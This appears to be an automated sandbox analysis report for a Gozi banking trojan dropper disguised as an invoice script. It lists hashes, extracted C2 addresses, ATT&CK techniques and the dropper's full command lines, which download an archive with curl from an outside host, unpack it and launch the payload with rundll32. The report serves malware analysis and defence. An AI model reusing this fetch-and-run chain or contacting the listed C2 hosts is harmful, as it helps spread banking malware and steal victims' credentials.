gozi | 4a44bf781e5ddd0a77dcaa97caafb1be31392fa6fc63891ff7e595318030b540

General

Target

Invoice_Details.js
Size

42KB
MD5

22067f54377e90dc3fdd5f384c1fe3ee
SHA1

56b2afbc94b67f1c1f5e0a2340e25ca066b9baad
SHA256

5e5722af27fc7ae05a9f9705ce1d680fec5fef27a67019c37e2bd768c8e7c07e
SHA512

af74c25ae0cc74316411d129d7c0a13e81efe0b0cbb207c1e45e323288364b36d1b2d383af5161efb3a7c491494b67bfee90ec8c97420a956b623eb4f12bfe56
SSDEEP

384:kac3is6ZeUS1ogXzxmOP0U4OmB/P9rVOKeHBYH8Ffu+wtizOdKUmJYgqEq4SjoaM:/7ylm9FgH1gTP5C1XfW51TJfmh1EE

Score

10^/10

gozi 20000 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

20000

C2

http://45.11.182.38

http://79.132.130.230

https://listwhfite.check3.yaho1o.com

https://lisfwhite.ch2eck.yaheoo.com

http://45.155.250.58

https://liset.che3ck.bi1ng.com

http://45.155.249.91

Attributes

base_path
/zerotohero/
build
250260
exe_type
loader
extension
.asi
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 3 IoCs

Processes:

rundll32.exe

flow pid process

99 4948 rundll32.exe
105 4948 rundll32.exe
170 4948 rundll32.exe
Downloads MZ/PE file

flow	pid	process
99	4948	rundll32.exe
105	4948	rundll32.exe
170	4948	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

Processes:

delectus.x

pid process

3816 delectus.x
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

4948 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3816	delectus.x

pid	process
4948	rundll32.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

delectus.xsvchost.exe

description	pid	process
Token: SeRestorePrivilege	3816	delectus.x
Token: 35	3816	delectus.x
Token: SeSecurityPrivilege	3816	delectus.x
Token: SeSecurityPrivilege	3816	delectus.x
Token: SeManageVolumePrivilege	4176	svchost.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

wscript.execmd.execmd.exerundll32.exe

description	pid	process	target process
PID 4748 wrote to memory of 4580	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 4580	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 3932	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 3932	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 3624	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 3624	4748	wscript.exe	cmd.exe
PID 3624 wrote to memory of 1776	3624	cmd.exe	curl.exe
PID 3624 wrote to memory of 1776	3624	cmd.exe	curl.exe
PID 4748 wrote to memory of 812	4748	wscript.exe	curl.exe
PID 4748 wrote to memory of 812	4748	wscript.exe	curl.exe
PID 4748 wrote to memory of 2732	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 2732	4748	wscript.exe	cmd.exe
PID 2732 wrote to memory of 3816	2732	cmd.exe	delectus.x
PID 2732 wrote to memory of 3816	2732	cmd.exe	delectus.x
PID 2732 wrote to memory of 3816	2732	cmd.exe	delectus.x
PID 4748 wrote to memory of 5052	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 5052	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 4036	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 4036	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 1412	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 1412	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 2756	4748	wscript.exe	rundll32.exe
PID 4748 wrote to memory of 2756	4748	wscript.exe	rundll32.exe
PID 4748 wrote to memory of 1428	4748	wscript.exe	cmd.exe
PID 4748 wrote to memory of 1428	4748	wscript.exe	cmd.exe
PID 2756 wrote to memory of 4948	2756	rundll32.exe	rundll32.exe
PID 2756 wrote to memory of 4948	2756	rundll32.exe	rundll32.exe
PID 2756 wrote to memory of 4948	2756	rundll32.exe	rundll32.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4748

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js"
2⤵
PID:4580

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo curl http://cajaminoretino.site/signed/3939.7z --output "C:\Users\Admin\AppData\Local\Temp\magnam.t" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"
2⤵
PID:3932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:3624

C:\Windows\system32\curl.exe
curl http://cajaminoretino.site/signed/3939.7z --output "C:\Users\Admin\AppData\Local\Temp\magnam.t" --ssl-no-revoke --insecure --location
3⤵
PID:1776

C:\Windows\System32\curl.exe
"C:\Windows\System32\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\Admin\AppData\Local\Temp\delectus.x"
2⤵
PID:812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\delectus.x" -p123 e -so "C:\Users\Admin\AppData\Local\Temp\magnam.t" > "C:\Users\Admin\AppData\Local\Temp\explicabo.m""
2⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Users\Admin\AppData\Local\Temp\delectus.x
"C:\Users\Admin\AppData\Local\Temp\delectus.x" -p123 e -so "C:\Users\Admin\AppData\Local\Temp\magnam.t"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\delectus.x"
2⤵
PID:5052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\magnam.t"
2⤵
PID:4036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\explicabo.m" "explicabo.meligendi.i"
2⤵
PID:1412

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\explicabo.meligendi.i", StartDll
2⤵
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\explicabo.meligendi.i", StartDll
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"
2⤵
PID:1428

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:4844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4176

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm
Filesize
16KB

MD5
6fa1ffa758c7f293a9a13f1be5c6542b

SHA1
779f01ab40311382adeff25869157a7e7b6a3165

SHA256
f63fb4bd3726a820e757669e2229099054bbe0bf3d1c7d382541171be3c4fb8a

SHA512
8ee9a1978dbc0cd1fa2c6bb34556033aff36a1532f4ab2532ca889163c330d0ff3179f6d52e84cc1a43fcb935d05c5ac022a619c15edb8b10ed62601fa10e66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\delectus.x
Filesize
571KB

MD5
58fc6de6c4e5d2fda63565d54feb9e75

SHA1
0586248c327d21efb8787e8ea9f553ddc03493ec

SHA256
72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

SHA512
e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

Download Submit
C:\Users\Admin\AppData\Local\Temp\delectus.x
Filesize
571KB

MD5
58fc6de6c4e5d2fda63565d54feb9e75

SHA1
0586248c327d21efb8787e8ea9f553ddc03493ec

SHA256
72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

SHA512
e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

Download Submit
C:\Users\Admin\AppData\Local\Temp\explicabo.m
Filesize
803KB

MD5
79c68cde8f43d762c4ecb97d359fc9c4

SHA1
05b04bc2e3a9c406b37fa7ba4c4b70deacae8b16

SHA256
f08827fd5dba2f6ffda8f931b5f2e1c18012b74ed753ea76a0a511e095eb1648

SHA512
c6e261544ea80b982397d42a80023ea20694bb7296284e6ab77fc7615af64c2d14b39187088c26e5536cbe435eac9f89297ad85b2513cbe97d5bf380e253ebef

Download Submit
C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat
Filesize
141B

MD5
81645f19426feb8cef198e042710cf15

SHA1
864554e97313c0d6c8e38008ebf92c6a215ac56f

SHA256
2e57a524f3da47467fc1abce82df02f2f4b16406480dadf2d48e7d992b89aba0

SHA512
61b9a948b472ddc5d70884bc41f944fa760ca8628d64d768cf13d33c3f54610c693b0d9a6f12b31e9bcfebac5691c8365bb7f8740ec6b589e2955efe3063c5e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\explicabo.meligendi.i
Filesize
803KB

MD5
79c68cde8f43d762c4ecb97d359fc9c4

SHA1
05b04bc2e3a9c406b37fa7ba4c4b70deacae8b16

SHA256
f08827fd5dba2f6ffda8f931b5f2e1c18012b74ed753ea76a0a511e095eb1648

SHA512
c6e261544ea80b982397d42a80023ea20694bb7296284e6ab77fc7615af64c2d14b39187088c26e5536cbe435eac9f89297ad85b2513cbe97d5bf380e253ebef

Download Submit
C:\Users\Admin\AppData\Local\Temp\magnam.t
Filesize
337KB

MD5
579f9bd0dede301f7442eb5ee6a0d35a

SHA1
7fdfffb492298a0755adf6a16b6743aa89322c97

SHA256
ac2e0ea966d0a2d648fc6681c61f86617bd9acb960efda7d17521e3ebaaf3a36

SHA512
757d3c52201e4a3d64b5551a73f3e9d39a2601e65c34c85bfa4625b41ed1d065211f2ac3ec44db8a62cd078d478e04918363d0c585870e0ca4d63507e697dc6a

Download Submit
memory/4176-194-0x00000259E27F0000-0x00000259E27F1000-memory.dmp

Filesize
4KB

Download
memory/4176-190-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-218-0x00000259E2A50000-0x00000259E2A51000-memory.dmp

Filesize
4KB

Download
memory/4176-150-0x00000259DA540000-0x00000259DA550000-memory.dmp

Filesize
64KB

Download
memory/4176-166-0x00000259DA640000-0x00000259DA650000-memory.dmp

Filesize
64KB

Download
memory/4176-182-0x00000259E2BB0000-0x00000259E2BB1000-memory.dmp

Filesize
4KB

Download
memory/4176-183-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-184-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-185-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-186-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-187-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-188-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-189-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-217-0x00000259E2940000-0x00000259E2941000-memory.dmp

Filesize
4KB

Download
memory/4176-191-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-192-0x00000259E2BD0000-0x00000259E2BD1000-memory.dmp

Filesize
4KB

Download
memory/4176-193-0x00000259E2800000-0x00000259E2801000-memory.dmp

Filesize
4KB

Download
memory/4176-216-0x00000259E2940000-0x00000259E2941000-memory.dmp

Filesize
4KB

Download
memory/4176-196-0x00000259E2800000-0x00000259E2801000-memory.dmp

Filesize
4KB

Download
memory/4176-199-0x00000259E27F0000-0x00000259E27F1000-memory.dmp

Filesize
4KB

Download
memory/4176-202-0x00000259D9FF0000-0x00000259D9FF1000-memory.dmp

Filesize
4KB

Download
memory/4176-214-0x00000259E2930000-0x00000259E2931000-memory.dmp

Filesize
4KB

Download
memory/4948-145-0x0000000002740000-0x000000000274E000-memory.dmp

Filesize
56KB

Download
memory/4948-144-0x0000000002780000-0x00000000027C1000-memory.dmp

Filesize
260KB

Download
memory/4948-146-0x0000000002760000-0x000000000276D000-memory.dmp

Filesize
52KB

Download
memory/4948-149-0x0000000002740000-0x000000000274E000-memory.dmp

Filesize
56KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads